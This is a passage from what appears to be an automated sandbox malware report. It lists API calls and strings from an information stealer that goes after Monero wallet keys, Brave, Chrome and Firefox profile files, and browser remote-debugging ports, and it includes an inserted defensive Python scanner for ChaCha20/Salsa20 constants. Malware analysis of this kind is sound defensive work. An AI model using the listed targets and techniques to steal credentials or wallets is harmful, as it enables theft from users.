                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 5db800e5f1bc8fe0de44aad9e9acee5ab66351f28e3e310c535387f9be819040
                                  • Instruction ID: b057d16a7999ff5e2110e87340f9a9ccfae810a0345366e60ab21014f2d5d8c7
                                  • Opcode Fuzzy Hash: 5db800e5f1bc8fe0de44aad9e9acee5ab66351f28e3e310c535387f9be819040
                                  • Instruction Fuzzy Hash: EDE0CDB098530CFBE7656B90ED0EB0C767C9B04B05F100194F708B61C4C6F425809758
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E610B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E610F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: d97549ce63dd7605d32b2b4282689ee39ea7bd85e4b17878a31ade35f064236e
                                  • Instruction ID: 104f1f034dd6a1b12c8ea28a0814489f99cf51d6062c8930c467d44cb792c87f
                                  • Opcode Fuzzy Hash: d97549ce63dd7605d32b2b4282689ee39ea7bd85e4b17878a31ade35f064236e
                                  • Instruction Fuzzy Hash: 75F0E2B1681208BBEB289AA4AC59FAFB7D8E705B44F301458F904E3280D5719E008BA0
                                  APIs
                                    • Part of subcall function 00E77A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77AA0
                                    • Part of subcall function 00E77A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E77AA7
                                    • Part of subcall function 00E77A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E77ABF
                                    • Part of subcall function 00E779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E611B7), ref: 00E77A10
                                    • Part of subcall function 00E779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E77A17
                                    • Part of subcall function 00E779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E77A2F
                                  • ExitProcess.KERNEL32 ref: 00E611C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: f7470d5b1df232ce31688a089f7ec7779843bb5c75e1cf6d50b77caf78fed9ac
                                  • Instruction ID: a892497331c399fcc369c2566904ff5aa43a80048353d36e8d17e4da853ec416
                                  • Opcode Fuzzy Hash: f7470d5b1df232ce31688a089f7ec7779843bb5c75e1cf6d50b77caf78fed9ac
                                  • Instruction Fuzzy Hash: 93E012FA94430153DA2473B47D1BB1B32CC5B2534EF046464FA1CB214AFD65E9508365
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00E80B32,00E80B2F,00000000,?,?,?,00E81450,00E80B2E), ref: 00E6BEC5
                                  • StrCmpCA.SHLWAPI(?,00E81454), ref: 00E6BF33
                                  • StrCmpCA.SHLWAPI(?,00E81458), ref: 00E6BF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6C8A9
                                  • FindClose.KERNEL32(000000FF), ref: 00E6C8BB
                                  Strings
                                  • \Brave\Preferences, xrefs: 00E6C1C1
                                  • Google Chrome, xrefs: 00E6C6F8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E6C534
                                  • Brave, xrefs: 00E6C0E8
                                  • Preferences, xrefs: 00E6C104
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E6C495
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E6C3B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 2c099dddd63f1a0a64d12085dadf19df8a76b402c3511e9c53615622886d7d03
                                  • Instruction ID: cfb7a17b44ddd48f8a6a735250df20f28506a100ef51202a222c9aa7b015ca96
                                  • Opcode Fuzzy Hash: 2c099dddd63f1a0a64d12085dadf19df8a76b402c3511e9c53615622886d7d03
                                  • Instruction Fuzzy Hash: 7D5243725001089BCB24FB60DD96EEE73BDAF94344F4495B9B50EB6095EE306B48CF62
                                  APIs
                                  • wsprintfA.USER32 ref: 00E73B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E73B33
                                  • lstrcat.KERNEL32(?,?), ref: 00E73B85
                                  • StrCmpCA.SHLWAPI(?,00E80F58), ref: 00E73B97
                                  • StrCmpCA.SHLWAPI(?,00E80F5C), ref: 00E73BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E73EB7
                                  • FindClose.KERNEL32(000000FF), ref: 00E73ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 1e298c88c5e982cb4634908f9d9d5289af7a1a1adaf8566c9d8eadd144687cff
                                  • Instruction ID: 5db6c105ca91698621debe07fd4c9f97af97e3512248c2db8a71e4bef5607ca0
                                  • Opcode Fuzzy Hash: 1e298c88c5e982cb4634908f9d9d5289af7a1a1adaf8566c9d8eadd144687cff
                                  • Instruction Fuzzy Hash: BCA132B2A002189BDB74EF64DC85FEE7379BB45300F048598F61DA6185EB709B88CF61
                                  APIs
                                  • wsprintfA.USER32 ref: 00E74B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E74B93
                                  • StrCmpCA.SHLWAPI(?,00E80FC4), ref: 00E74BC1
                                  • StrCmpCA.SHLWAPI(?,00E80FC8), ref: 00E74BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E74DCD
                                  • FindClose.KERNEL32(000000FF), ref: 00E74DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: ea72fa88a8b019f6e05d2d73349b3812a46028b642bfd78f65b23ee0ec7961c5
                                  • Instruction ID: ac53955df2329fcac2f48eae5624b2b588dfbbbc33294f8f760d6778ec003a30
                                  • Opcode Fuzzy Hash: ea72fa88a8b019f6e05d2d73349b3812a46028b642bfd78f65b23ee0ec7961c5
                                  • Instruction Fuzzy Hash: BE613BB2500219ABDB74EBA0DC45FEA737CBB48704F0485D8F61DA6185EB709B88CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E747D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E747D7
                                  • wsprintfA.USER32 ref: 00E747F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E7480D
                                  • StrCmpCA.SHLWAPI(?,00E80FAC), ref: 00E7483B
                                  • StrCmpCA.SHLWAPI(?,00E80FB0), ref: 00E74851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E748DB
                                  • FindClose.KERNEL32(000000FF), ref: 00E748F0
                                  • lstrcat.KERNEL32(?,0173E3B8), ref: 00E74915
                                  • lstrcat.KERNEL32(?,0173D5E0), ref: 00E74928
                                  • lstrlen.KERNEL32(?), ref: 00E74935
                                  • lstrlen.KERNEL32(?), ref: 00E74946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: c897eebeaafd62f4e9f9989b72546e96a80f9af2e629bc6ae3c0c6a780ee2d65
                                  • Instruction ID: 38585e93cb9351ee30e85349826d862e9e41d4db1ea1452b4e55bc9d762d13f3
                                  • Opcode Fuzzy Hash: c897eebeaafd62f4e9f9989b72546e96a80f9af2e629bc6ae3c0c6a780ee2d65
                                  • Instruction Fuzzy Hash: 545158B6540218ABDB64EB70DC89FED73BCAB58300F409598F61DA6184EB709BC4CF91
                                  APIs
                                  • wsprintfA.USER32 ref: 00E74113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E7412A
                                  • StrCmpCA.SHLWAPI(?,00E80F94), ref: 00E74158
                                  • StrCmpCA.SHLWAPI(?,00E80F98), ref: 00E7416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E742BC
                                  • FindClose.KERNEL32(000000FF), ref: 00E742D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 918fe11fccb5d4210f46776ae5bc0ab80a1beb9074cbfb0456231902de61c3a9
                                  • Instruction ID: 0811601c51aeb9a8e0264f970f8101c0c04592069098767c457efac60cf0f300
                                  • Opcode Fuzzy Hash: 918fe11fccb5d4210f46776ae5bc0ab80a1beb9074cbfb0456231902de61c3a9
                                  • Instruction Fuzzy Hash: F05135F6500218ABCB28EBB0DD45EEA737CBB54300F448598B61DA6085DB719BC9CF50
                                  APIs
                                  • wsprintfA.USER32 ref: 00E6EE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E6EE55
                                  • StrCmpCA.SHLWAPI(?,00E81630), ref: 00E6EEAB
                                  • StrCmpCA.SHLWAPI(?,00E81634), ref: 00E6EEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6F3AE
                                  • FindClose.KERNEL32(000000FF), ref: 00E6F3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 8a512eced1e6f834dd122dd6d0cec02b6875d52a2a4453c792b3921f8c480965
                                  • Instruction ID: 82e5b1a2f357ef87297e8e2b065c47c7c67a1c261c10320c5e51329bd19add4a
                                  • Opcode Fuzzy Hash: 8a512eced1e6f834dd122dd6d0cec02b6875d52a2a4453c792b3921f8c480965
                                  • Instruction Fuzzy Hash: 42E10F729111189ADB55FB60DC62EEE73BDAF94300F4495F9B40E72092EE306B89CF52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: 7a576056c5a608bcd481554e5b3839a5aaeea35c2f2cec78d585f988a929f2b6
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: F1E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
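                                  The String ID of the record above ("2-by", "expa", "nd 3", "te k", "expand 32-by", ...) is the constant "expand 32-byte k" broken into 4-byte pieces. That is the "sigma" constant that Salsa20 and ChaCha20 load into state words 0..3, and the fragmentation is what a compiler produces when it emits the constant as four 32-bit immediates instead of one contiguous string; a plain string search for "expand 32-byte k" over the 0x00E8C000 region would therefore miss it. The following scanner is an added example, not code from the report or from Joe Sandbox: it checks a byte buffer for both the contiguous and the split-immediate layout of the 256-bit ("sigma") and 128-bit ("tau") constants. The sample buffer is constructed here and the 64-byte window is an assumption about how far apart the four immediates may sit.

```python
"""Locate Salsa20/ChaCha20 key-expansion constants in a memory dump."""

SIGMA = b"expand 32-byte k"   # constant used with a 256-bit key
TAU = b"expand 16-byte k"     # constant used with a 128-bit key
CONSTANTS = (("sigma", SIGMA), ("tau", TAU))


def _words(const: bytes) -> list:
    """Split a 16-byte constant into the four 32-bit words a compiler emits."""
    return [const[i:i + 4] for i in range(0, 16, 4)]


def find_contiguous(buf: bytes) -> list:
    """(offset, name) for every constant stored as one 16-byte string."""
    hits = []
    for name, const in CONSTANTS:
        start = 0
        while (pos := buf.find(const, start)) != -1:
            hits.append((pos, name))
            start = pos + 1
    return hits


def find_split(buf: bytes, window: int = 64) -> list:
    """(offset, name) where the first word of a constant is followed, within
    `window` bytes, by its other three words in any order. This is the
    layout of a compiled routine that loads the state with four separate
    mov/xor instructions carrying the words as immediates."""
    hits = []
    for name, const in CONSTANTS:
        first, rest = _words(const)[0], _words(const)[1:]
        start = 0
        while (pos := buf.find(first, start)) != -1:
            region = buf[pos:pos + window]
            if all(word in region for word in rest):
                hits.append((pos, name))
            start = pos + 1
    return hits


def constants_present(buf: bytes) -> set:
    """Names of the constants found in either layout."""
    return {name for _, name in find_contiguous(buf) + find_split(buf)}


# Constructed sample (assumption, not a dump from the report): sigma carried
# as four x86 'mov dword ptr [eax+disp], imm32' immediates, then tau stored
# contiguously further on.
SAMPLE = (
    b"\x90" * 8
    + b"\xc7\x00" + b"expa"          # mov dword ptr [eax],      'expa'
    + b"\xc7\x40\x04" + b"nd 3"      # mov dword ptr [eax+4],    'nd 3'
    + b"\xc7\x40\x08" + b"2-by"      # mov dword ptr [eax+8],    '2-by'
    + b"\xc7\x40\x0c" + b"te k"      # mov dword ptr [eax+0xc],  'te k'
    + b"\x90" * 32
    + TAU
    + b"\x00" * 16
)

if __name__ == "__main__":
    for off, name in sorted(find_contiguous(SAMPLE) + find_split(SAMPLE)):
        print(f"{name} at 0x{off:x}")
```

Run it over the dumps listed under Memory Dump Source (for example the region starting at 0x00E8C000) to confirm the layout the IDA plugin's string fragments suggest; a hit on "sigma" says the routine sets up a Salsa20/ChaCha20 state, not which of the two ciphers is used, since both share the constant.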
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E816B0,00E80D97), ref: 00E6F81E
                                  • StrCmpCA.SHLWAPI(?,00E816B4), ref: 00E6F86F
                                  • StrCmpCA.SHLWAPI(?,00E816B8), ref: 00E6F885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6FBB1
                                  • FindClose.KERNEL32(000000FF), ref: 00E6FBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 2c1dc7320d78e201f5aabebb2eca654fa285b328b22f74ba2ac203e487a31bc7
                                  • Instruction ID: 8ed6377bda69d2d5de0b0ee161410255f4dce081fb9ac7b94ae31fc45611706e
                                  • Opcode Fuzzy Hash: 2c1dc7320d78e201f5aabebb2eca654fa285b328b22f74ba2ac203e487a31bc7
                                  • Instruction Fuzzy Hash: 2DB12171A001189BDB24FF64DD96EED73B9AF94340F1495B8E40E67185EF30AB48CB92
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E8523C,?,?,?,00E852E4,?,?,00000000,?,00000000), ref: 00E61963
                                  • StrCmpCA.SHLWAPI(?,00E8538C), ref: 00E619B3
                                  • StrCmpCA.SHLWAPI(?,00E85434), ref: 00E619C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E61D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E61E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E61E60
                                  • FindClose.KERNEL32(000000FF), ref: 00E61E72
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 629a0663e201de8c1765e3e57dee2871ea9987baa36ed78d8aedabd84bbff0f2
                                  • Instruction ID: 80086b8ef0af824083e3f56f916dfaee048b75eda2e3d6b0afe1a5200d261cba
                                  • Opcode Fuzzy Hash: 629a0663e201de8c1765e3e57dee2871ea9987baa36ed78d8aedabd84bbff0f2
                                  • Instruction Fuzzy Hash: 4312C271950118ABDB19FB60DC66EEE73B9AF94300F5895F9A10E72091EF306B88CF51
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E80C32), ref: 00E6DF5E
                                  • StrCmpCA.SHLWAPI(?,00E815C0), ref: 00E6DFAE
                                  • StrCmpCA.SHLWAPI(?,00E815C4), ref: 00E6DFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6E4E0
                                  • FindClose.KERNEL32(000000FF), ref: 00E6E4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 6e5d6eba76de82d52f3ea5774bdffd26a5f0ac8a723eba8fa9ffa9bf84cd4709
                                  • Instruction ID: 8dce3070629a8a30656359ab310c2492a59c356e299af37ff5612fecd9deaf49
                                  • Opcode Fuzzy Hash: 6e5d6eba76de82d52f3ea5774bdffd26a5f0ac8a723eba8fa9ffa9bf84cd4709
                                  • Instruction Fuzzy Hash: 52F1D0719141189ACB25FB60DCA5EEEB3B9AF94300F54A5F9A01E72091EF306F89CF51
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
